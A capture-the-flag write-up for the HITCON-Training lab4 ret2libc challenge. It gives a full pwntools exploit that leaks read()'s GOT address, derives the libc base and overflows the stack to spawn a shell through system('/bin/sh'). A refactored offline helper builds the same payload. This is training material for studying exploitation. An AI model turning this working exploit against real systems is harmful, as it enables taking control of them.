HITCON-Training-master lab4 writeup
[HITCON-Training-master lab4 writeup] A simple ret2libc. The binary prints the 4 bytes stored at any address you give it, so the exploit leaks read()'s GOT entry to recover the libc base, then overflows the stack buffer and returns into system("/bin/sh"). Not much to say, straight to the script.
exp (exploit script):
from pwn import *

context.log_level = "debug"
context(arch="i386", os="linux")

p = process("./ret2lib")
lib = ELF("/lib/i386-linux-gnu/libc.so.6")   # must be the libc the target actually loads
elf = ELF("./ret2lib")

# the binary is not PIE, so the GOT address is fixed
read_got = elf.got["read"]

# offsets inside libc; only valid for this libc build
system_lib = lib.symbols["system"]
read_lib = lib.symbols["read"]
binsh_lib = next(lib.search(b"/bin/sh"))

log.info("****************leak address****************")
# the program asks for an address in decimal and prints the 4 bytes there with %p
p.recv()
p.sendline(str(read_got).encode())
p.recvuntil(b"0x")
read_add = int(p.recvline().strip(), 16)   # runtime address of read() in libc
libc_base = read_add - read_lib
print("libc_base --> [%s]" % hex(libc_base))
system_add = libc_base + system_lib
print("system address --> [%s]" % hex(system_add))
binsh_add = libc_base + binsh_lib
print("binsh_add --> [%s]" % hex(binsh_add))

log.info("**************ret2libc*********************")
# 0x38 bytes fill the buffer, "bbbb" overwrites the saved ebp, then the saved
# return address becomes system(), followed by a dummy return address for
# system() and its single argument, the pointer to "/bin/sh" inside libc
payload = b"a" * 0x38 + b"bbbb" + p32(system_add) + p32(0xdeadbeef) + p32(binsh_add)
p.recv()
p.sendline(payload)
p.interactive()
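The script above does the leak parsing, the libc-base arithmetic and the frame layout inline against a live process. The following is an added example, not part of the original writeup, that pulls those three steps into plain functions so they can be checked offline without pwntools or the target binary: it uses struct instead of p32, parses the %p output with a regex instead of assuming exactly 8 hex digits, and rejects a libc base that is not page-aligned (the usual sign that the wrong libc build was used). The leak line and the read/system/"/bin/sh" offsets are constructed sample values, not taken from a real run.

```python
import re
import struct

# Constructed sample input (assumption: not from a real run of ./ret2lib).
# It mimics the line the exploit waits for with recvuntil("0x").
SAMPLE_LEAK_LINE = b"The content of the address : 0xf7e4e350\n"

# Hypothetical libc offsets standing in for lib.symbols[...] and lib.search().
READ_OFF = 0x000D5350
SYSTEM_OFF = 0x0003A940
BINSH_OFF = 0x0015B9AB

LEAK_RE = re.compile(rb"0x([0-9a-fA-F]+)")


def parse_leak(line):
    """Return the pointer printed with %p, whatever its width."""
    m = LEAK_RE.search(line)
    if m is None:
        raise ValueError("no 0x... address in leak line: %r" % line)
    return int(m.group(1), 16)


def libc_base_from_leak(leaked_read, read_off):
    """libc base = runtime read() address - read()'s offset in libc."""
    base = leaked_read - read_off
    # libc is mmap'ed page-aligned; a misaligned result means the symbol
    # offset came from a different libc build than the one the target loads
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc?" % base)
    return base


def p32(value):
    """Little-endian 32-bit pack, the same layout pwntools' p32 produces on i386."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_payload(system_addr, binsh_addr, buf_size=0x38, ret_after=0xDEADBEEF):
    """Overflow layout used by the exploit: buffer, saved ebp, then a fake
    call frame for system(): [return addr -> system][system's own return
    address][system's first argument -> "/bin/sh"]."""
    return (
        b"a" * buf_size
        + b"bbbb"
        + p32(system_addr)
        + p32(ret_after)
        + p32(binsh_addr)
    )


def resolve(leak_line, read_off=READ_OFF, system_off=SYSTEM_OFF, binsh_off=BINSH_OFF):
    """Turn one leaked line into the addresses the final payload needs."""
    base = libc_base_from_leak(parse_leak(leak_line), read_off)
    return {"base": base, "system": base + system_off, "binsh": base + binsh_off}


if __name__ == "__main__":
    addrs = resolve(SAMPLE_LEAK_LINE)
    for name, value in addrs.items():
        print("%s --> [%s]" % (name, hex(value)))
    payload = build_payload(addrs["system"], addrs["binsh"])
    print("payload length: %d, system at offset %d" % (len(payload), 0x38 + 4))
```

The page-alignment check is cheap and catches the most common ret2libc failure: a leak that looks plausible but was subtracted against offsets from a different libc, which then sends system() to garbage.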